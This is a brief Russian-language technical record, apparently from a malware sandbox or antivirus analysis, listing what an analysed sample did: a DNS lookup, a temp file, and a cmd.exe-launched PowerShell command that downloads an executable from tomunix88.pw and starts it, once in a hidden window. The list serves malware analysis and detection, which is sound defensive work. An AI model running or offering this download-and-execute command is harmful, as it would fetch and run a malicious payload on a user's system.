Техническая информация
- http://tomunix88.pw/tomtop.exe как %temp%\carnitine.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://tomunix88.pw/tomtop.exe','%TEMP%\carnitine.exe');Start-Process '%TEMP%\carnitine.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1960
- %TEMP%\754030.cvr
- DNS ASK to###ix88.pw
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://tomunix88.pw/tomtop.exe','%TEMP%\carnitine.exe');Start-Process '%TEMP%\carnitine.exe';' (со скрытым окном)